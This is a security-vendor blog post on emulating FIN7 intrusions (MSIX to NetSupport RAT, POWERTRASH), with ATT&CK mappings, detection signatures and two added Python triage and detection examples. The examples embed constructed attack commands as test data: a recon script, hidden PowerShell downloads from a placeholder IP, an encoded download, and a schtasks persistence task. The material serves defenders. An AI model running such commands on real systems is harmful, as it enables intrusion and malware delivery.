Emulating the Financially Motivated Criminal Adversary FIN7 – Part 1
2024-12-12 23:15:05 Author: securityboulevard.com

FIN7, also known as Carbon Spider, is a highly sophisticated and financially motivated criminal adversary that began its operations in 2013 by targeting Russian financial institutions. In late 2015, FIN7 expanded its targeting profile to include the Middle East, Europe, and North America, primarily in pursuit of payment card data. The group has been observed leveraging Point-of-Sale (PoS) malware to harvest card data, which was subsequently monetized by selling the stolen information on credit card markets such as Joker’s Stash.

At the beginning of 2020, FIN7 broadened its operational scope to engage in Big Game Hunting (BGH) activities. To this end, the group began employing the REvil ransomware before developing its proprietary ransomware, DarkSide. In November of the same year, FIN7 launched an affiliate program which offered DarkSide under the Ransomware-as-a-Service (RaaS) business model in exchange for a share of the profits generated from successful attacks.

In May 2021, a DarkSide intrusion at Colonial Pipeline disrupted critical fuel supply chains across the southeastern United States, leading to widespread panic buying and temporary fuel shortages. The incident drew significant attention from law enforcement and regulatory bodies and forced the abrupt cessation of DarkSide operations. Shortly thereafter, in July 2021, FIN7 introduced a new RaaS offering called BlackMatter, which remained active until November 2021.

The group has targeted a wide range of sectors, including financial services, hospitality, retail, healthcare and life sciences, technology, transportation, manufacturing, media, professional services, and energy, resources & utilities.

AttackIQ has released two new attack graphs that emulate the behaviors exhibited by the Russian adversary FIN7 during 2024 to help customers validate their security controls and their ability to defend against this threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using these new assessment templates in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against a long-standing financially motivated adversary.
  • Assess their security posture against an adversary that has recently engaged in ransomware activities.
  • Continuously validate detection and prevention pipelines against a highly sophisticated adversary active worldwide.

FIN7 – 2024-04 – MSIX Application Installers lead to NetSupport RAT Deployment

In April 2024, eSentire’s Threat Response Unit (TRU) identified activities conducted by the financially motivated adversary FIN7 involving the use of malicious websites to impersonate well-known brands. These websites, promoted through sponsored Google Ads, prompted users to download a fake browser extension through a pop-up. Instead, the download delivered a Windows App Installer (MSIX) file, which was subsequently used to deploy the NetSupport Remote Access Trojan (RAT).

Initial Access & Discovery – Malware Delivery and Local System Discovery

This stage begins with the deployment of a Windows App Installer (MSIX) file and continues with the delivery of a PowerShell script contained within it, which collects system information and the names of installed security products.

Ingress Tool Transfer (T1105): This scenario downloads a known malicious sample to memory and, in an independent scenario, saves it to disk, so that both network and endpoint controls are tested on their ability to prevent delivery of the sample.

System Information Discovery (T1082): This scenario queries the Win32_OperatingSystem WMI class to obtain operating system information.

System Information Discovery (T1082): This scenario executes the Get-WmiObject Win32_ComputerSystem PowerShell command to obtain detailed information pertaining to the compromised host.

Security Software Discovery (T1518.001): This scenario queries the AntiVirusProduct WMI class (root\SecurityCenter2 namespace, present on Windows client editions) to determine which antivirus products are registered on the host.
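Static triage of an MSIX package for a bundled launch script, added here as an example for this write-up (not AttackIQ's or eSentire's code). It assumes the script is wired in the way MSIX packages normally run one, through a Package Support Framework config.json whose application entry carries a startScript block (key names follow the PSF documentation and are an assumption about the sample); the package, manifest, config and script below are constructed in memory for the example. The triage reports the package identity, any launch script, and which of the discovery strings from this stage appear in that script.

```python
"""Static triage of an MSIX for a PSF launch script. Added example, not the
page's code. MSIX is a ZIP container; the PSF config.json layout and the
sample package are assumptions constructed for this example."""
import io
import json
import zipfile
import xml.etree.ElementTree as ET

APPX_NS = "{http://schemas.microsoft.com/appx/manifest/foundation/windows10}"
# Strings from the discovery stage above, matched case-insensitively inside
# any script the package launches.
SCRIPT_INDICATORS = ("win32_operatingsystem", "win32_computersystem", "antivirusproduct",
                     "securitycenter2", "invoke-webrequest", "downloadfile",
                     "downloadstring", "iwr ")

MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<Package xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10">
  <Identity Name="Example.BrowserExtension" Publisher="CN=Example Publisher, O=Example" Version="1.0.0.0"/>
  <Applications><Application Id="App" Executable="PsfLauncher64.exe" EntryPoint="Windows.FullTrustApplication"/></Applications>
</Package>"""

# Assumed PSF layout: startScript runs before the packaged executable.
PSF_CONFIG = {"applications": [{"id": "App", "executable": "app\\setup.exe",
              "startScript": {"scriptPath": "update.ps1",
                              "scriptExecutionMode": "-ExecutionPolicy Bypass",
                              "waitForScriptToFinish": True, "showWindow": False}}]}

# Constructed recon script mirroring the discovery commands in this stage.
RECON_SCRIPT = ("Get-WmiObject Win32_OperatingSystem | Select Caption,Version\n"
                "Get-WmiObject Win32_ComputerSystem\n"
                "Get-WmiObject -Namespace root\\SecurityCenter2 -Class AntiVirusProduct | Select displayName\n"
                "Invoke-WebRequest https://203.0.113.10/stage2 -OutFile $env:TEMP\\s2.exe\n")


def build_sample_msix(with_script: bool) -> bytes:
    """Build a minimal MSIX-shaped ZIP in memory (constructed sample, not a real package)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AppxManifest.xml", MANIFEST)
        z.writestr("PsfLauncher64.exe", b"MZ")  # placeholder stub, not a real binary
        if with_script:
            z.writestr("config.json", json.dumps(PSF_CONFIG))
            z.writestr("update.ps1", RECON_SCRIPT)
    return buf.getvalue()


def triage_msix(blob: bytes) -> dict:
    """Return identity, publisher, PSF launch scripts and indicator hits for one package."""
    report = {"identity": None, "publisher": None, "launch_scripts": [], "indicators": []}
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        names = z.namelist()
        if "AppxManifest.xml" in names:
            ident = ET.fromstring(z.read("AppxManifest.xml")).find(APPX_NS + "Identity")
            if ident is not None:
                report["identity"], report["publisher"] = ident.get("Name"), ident.get("Publisher")
        for name in names:
            if name.lower().rsplit("/", 1)[-1] != "config.json":
                continue
            try:
                cfg = json.loads(z.read(name))
            except ValueError:
                continue  # not a PSF config; ignore
            for app in cfg.get("applications", []):
                for hook in ("startScript", "endScript"):
                    path = (app.get(hook) or {}).get("scriptPath")
                    if not path:
                        continue
                    report["launch_scripts"].append((hook, path))
                    member = path.replace("\\", "/")
                    if member in names:  # script shipped inside the package: scan it
                        body = z.read(member).decode("utf-8", errors="replace").lower()
                        report["indicators"] += [t.strip() for t in SCRIPT_INDICATORS if t in body]
    return report


if __name__ == "__main__":
    for with_script in (True, False):
        print(triage_msix(build_sample_msix(with_script)))
```

The presence of a launch script is itself the triage signal: a package that claims to be a browser extension has no reason to run PowerShell at install time. A full check would also verify the AppxSignature.p7x signer against the Identity Publisher, which this example does not do.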

Command and Control – Payload Deployment

At this stage, the NetSupport Remote Access Trojan (RAT) is deployed, enabling the adversary to establish a remote connection to the compromised system. Subsequently, the CSVDE command-line tool is deployed, which allows the import and export of Active Directory data. Next, a ZIP file is deployed, containing within it a Python executable (EXE) and a Python (PY) payload.

Persistence & Command and Control – Final Payload Delivery

This stage begins with the retrieval of the User Principal Name (UPN) of the currently logged-in user using the whoami command. Then persistence is acquired through the creation of a scheduled task named “Updater”. The stage concludes with the deployment of DiceLoader, a Remote Access Trojan (RAT) developed in .NET.

System Owner/User Discovery (T1033): This scenario executes the native whoami /upn command to obtain the User Principal Name (UPN) of the running user account.

Scheduled Task/Job: Scheduled Task (T1053.005): This scenario acquires persistence through the creation of a new scheduled task named “Updater” using the schtasks utility.

Process Injection (T1055): This scenario injects arbitrary code into the memory space of a remote process using the CreateRemoteThread/LoadLibrary method: the path of a DLL is written into the target process and a remote thread is started at LoadLibrary, so that the target loads the DLL itself.

FIN7 – 2024-04 – Spear Phishing and Typosquatting Leads to POWERTRASH Deployment

At the end of 2023, BlackBerry researchers identified a phishing campaign conducted by the financially motivated adversary FIN7 against a large automotive manufacturer based in the United States. During this activity, the adversary sent spearphishing emails offering a fake IP scanning utility that, once executed, deploys a backdoor providing an initial foothold within the targeted network. To improve its odds, FIN7 targeted employees within the company’s IT department who held higher levels of administrative privileges.

Initial Access & Execution – Payload Delivery

This stage focuses on the deployment of the initial payload, beginning with a malicious executable disguised as the Advanced IP Scanner utility. This executable deploys a secondary executable containing a multi-stage execution chain.

As part of this chain, several files are dropped, including jutil.dll, mspdf.dll, and audio.wav; the shellcode carried in audio.wav is then executed by passing it as the callback to the EnumWindows API.

Ingress Tool Transfer (T1105): This scenario downloads a known malicious sample to memory and, in an independent scenario, saves it to disk, so that both network and endpoint controls are tested on their ability to prevent delivery of the sample.

Process Injection (T1055): This scenario allocates memory in the current process using VirtualAlloc, writes arbitrary code into it, changes the memory protection to executable using VirtualProtect, and runs the shellcode by passing it as the callback to EnumWindows, so no remote process is touched.

Execution & Discovery – Environment Reconnaissance

At this stage, POWERTRASH, an in-memory dropper written in PowerShell designed to execute an embedded payload directly in memory, is deployed. The stage then gathers information about the compromised system, including its timezone, active processes, and domain administrator accounts.

Command and Scripting Interpreter: PowerShell (T1059.001): This scenario encodes a user-defined PowerShell script as base64 (of its UTF-16LE representation, as PowerShell expects) and then executes it using PowerShell’s -EncodedCommand parameter.

System Time Discovery (T1124): The scenario identifies the current time of the compromised system through the net time command.

Process Discovery (T1057): This scenario uses the Windows built-in tasklist command to discover running processes.

Account Discovery: Domain Account (T1087.002): This scenario uses the net group command to list Domain and Enterprise Admins accounts.

Persistence & Command and Control – Secure Shell (SSH) Communication

This stage begins with the use of the icacls utility to modify file permissions, ensuring continued access to generated SSH keys, and establishes persistence through the creation of a scheduled task. Finally, a modification to the local firewall is performed using PowerShell, allowing communication via Secure Shell (SSH).

Windows File and Directory Permissions Modification (T1222.001): This scenario uses the icacls.exe utility to modify file permissions, granting explicit Full (F) rights on a generated temporary file.

Scheduled Task/Job: Scheduled Task (T1053.005): This scenario acquires persistence through the creation of a new scheduled task named “Microsoft\Windows\System” using the schtasks utility.

Impair Defenses: Disable or Modify System Firewall (T1562.004): The scenario uses the New-NetFirewallRule PowerShell cmdlet to create a new Windows Defender Firewall rule that allows outbound traffic.

Remote Services: SSH (T1021.004): This scenario will initiate an SSH connection to an external AttackIQ-hosted server to exercise restrictions in outbound traffic.

Discovery – Local Environment Discovery

This stage focuses on gathering additional information about the local system, such as the hostname, username, available accounts, and active processes.

System Information Discovery (T1082): This scenario executes the native hostname command to get the compromised host’s computer name.

System Owner/User Discovery (T1033): This scenario executes the native whoami command to obtain details of the running user account.

Account Discovery (T1087): This scenario executes the net user command to obtain a list of accounts known to the compromised host.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily on downloading additional stages of malware. Both endpoint and network security controls should be employed to detect and block the delivery of these payloads.

1a. Detection

The following signature can help identify when native utilities are being used to download malicious payloads. A single command line normally carries only one download primitive (Invoke-WebRequest/IWR, or a WebClient method such as DownloadData, DownloadString or DownloadFile), so the primitives are alternatives; the “Hidden” term (as in -WindowStyle Hidden) is what narrows the match to scripted, user-invisible downloads.

PowerShell Example:

Process Name == (“cmd.exe” OR “powershell.exe”)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest” OR “DownloadData” OR “DownloadString” OR “DownloadFile”) AND “Hidden”)

1b. Mitigation

MITRE ATT&CK publishes mitigation recommendations for Ingress Tool Transfer (T1105).

2. Scheduled Task/Job: Scheduled Task (T1053.005)

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be run directly from the command line, or the Task Scheduler can be opened through the GUI within the Administrative Tools section of the Control Panel.

2a. Detection

With an EDR or SIEM platform, you can detect the following commands being issued to schedule a malicious task. Because cmd.exe launching schtasks trivially puts “cmd” on the command line, matching the shell name inside the task action (/TR) rather than anywhere on the line reduces noise.

Process Name == (“cmd.exe” OR “powershell.exe”)
Command Line CONTAINS (“schtasks” AND “/CREATE” AND (“cmd” OR “powershell”))

2b. Mitigation

MITRE ATT&CK publishes mitigation recommendations for Scheduled Task (T1053.005).

 3. Process Injection (T1055):

Malware will commonly inject malicious code into legitimate running processes to attempt to blend in with legitimate applications to remain hidden and appear normal to the compromised system.

3a. Detection

Searching for common processes that are performing uncommon actions can help identify when a process has been compromised; for example, an executable in a user-writable directory creating a remote thread in explorer.exe that starts at LoadLibrary is the DLL-injection pattern emulated above.

3b. Mitigation

MITRE ATT&CK publishes mitigation recommendations for Process Injection (T1055).
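The signatures from 1a, 2a and 3a as runnable logic, added here as an example for this write-up (not AttackIQ’s code or any product’s query language). It runs over constructed Sysmon-style events (Event ID 1 ProcessCreate for command lines, Event ID 8 CreateRemoteThread for injection), decodes -EncodedCommand payloads before matching so that the encoded download one-liner from the POWERTRASH stage does not slip past 1a, and restricts 2a to the task’s /TR action. The events, the address 203.0.113.10, the task names and the file paths are all constructed for the example.

```python
"""Detection logic for sections 1a-3a over constructed Sysmon-style events.
Added example, not AttackIQ's code. Field names follow Sysmon Event ID 1
(ProcessCreate) and Event ID 8 (CreateRemoteThread); every event below is
constructed for illustration, not captured from a FIN7 intrusion."""
import base64
import re

SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")
# Download primitives used in PowerShell one-liners; a line carries one of them,
# so they are alternatives rather than an AND.
DOWNLOAD_TOKENS = ("iwr", "invoke-webrequest", "downloaddata", "downloadstring", "downloadfile")


def encode_powershell(script: str) -> str:
    """-EncodedCommand takes base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the script behind -e/-ec/-enc/-EncodedCommand, or None.
    The prefix must be followed by whitespace, so -ep and -ExecutionPolicy do not match."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError: not real base64
        return None


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_ingress(ev, text):
    """1a: shell + download primitive + hidden window (T1105)."""
    return (image_name(ev["Image"]) in SHELLS
            and any(tok in text for tok in DOWNLOAD_TOKENS)
            and "hidden" in text)


def rule_schtasks(ev, text):
    """2a: schtasks /CREATE whose /TR action launches cmd or powershell (T1053.005)."""
    if image_name(ev["Image"]) not in SHELLS or "schtasks" not in text or "/create" not in text:
        return False
    m = re.search(r'/tr\s+("[^"]*"|\S+)', text)
    return bool(m) and any(s in m.group(1) for s in ("cmd", "powershell"))


def rule_remote_thread(ev):
    """3a: remote thread in another process starting at LoadLibrary* (T1055)."""
    return (ev["EventID"] == 8
            and ev.get("StartFunction", "").lower().startswith("loadlibrary")
            and image_name(ev["SourceImage"]) != image_name(ev["TargetImage"]))


CMDLINE_RULES = (("T1105 hidden download", rule_ingress),
                 ("T1053.005 schtasks to shell", rule_schtasks))


def run_detections(events):
    """Return [(rule name, short evidence)] for every event that fires a rule."""
    hits = []
    for ev in events:
        if ev["EventID"] == 1:
            text = ev["CommandLine"]
            decoded = decode_encoded_command(text)
            if decoded:  # match on the decoded script as well as the visible line
                text = f"{text} {decoded}"
            text = text.lower()
            for name, rule in CMDLINE_RULES:
                if rule(ev, text):
                    hits.append((name, ev["CommandLine"][:70]))
        elif rule_remote_thread(ev):
            hits.append(("T1055 LoadLibrary remote thread",
                         f'{image_name(ev["SourceImage"])} -> {image_name(ev["TargetImage"])}'))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
HIDDEN_DOWNLOAD = "$w=New-Object Net.WebClient;$b=$w.DownloadData('https://203.0.113.10/s.bin')"

SAMPLE_EVENTS = [  # constructed, Sysmon-style
    {"EventID": 1, "Image": PS,
     "CommandLine": 'powershell.exe -WindowStyle Hidden -c "IWR https://203.0.113.10/u.bin -OutFile C:\\Users\\Public\\u.bin"'},
    {"EventID": 1, "Image": PS,  # same download, hidden behind -enc
     "CommandLine": "powershell.exe -w hidden -enc " + encode_powershell(HIDDEN_DOWNLOAD)},
    {"EventID": 1, "Image": CMD,
     "CommandLine": 'cmd.exe /c schtasks /CREATE /SC MINUTE /MO 5 /TN "Updater" /TR "powershell -ep bypass -f C:\\Users\\Public\\u.ps1"'},
    {"EventID": 1, "Image": CMD,  # task action is not a shell: should stay quiet
     "CommandLine": 'cmd.exe /c schtasks /CREATE /SC DAILY /TN "Backup" /TR "C:\\Tools\\backup.exe"'},
    {"EventID": 1, "Image": PS,  # discovery only; no download, no task
     "CommandLine": "powershell.exe Get-WmiObject Win32_ComputerSystem"},
    {"EventID": 8, "SourceImage": r"C:\Users\Public\loader.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "StartFunction": "LoadLibraryA"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",  # benign OS activity
     "TargetImage": r"C:\Windows\System32\svchost.exe", "StartFunction": ""},
]

if __name__ == "__main__":
    for name, evidence in run_detections(SAMPLE_EVENTS):
        print(f"[{name}] {evidence}")
```

Run stand-alone, the block reports the two downloads, the “Updater” task and the loader.exe to explorer.exe thread, and stays silent on the backup task, the WMI query and the csrss.exe activity. The decode step is the part worth keeping in any real rule set: without it, the second event carries only “hidden” on the visible command line and never matches.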

Wrap-up

In summary, these attack graphs will evaluate security and incident response processes and support the improvement of your security control posture against the activities carried out by the FIN7 adversary. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.


Source: https://securityboulevard.com/2024/12/emulating-the-financially-motivated-criminal-adversary-fin7-part-1/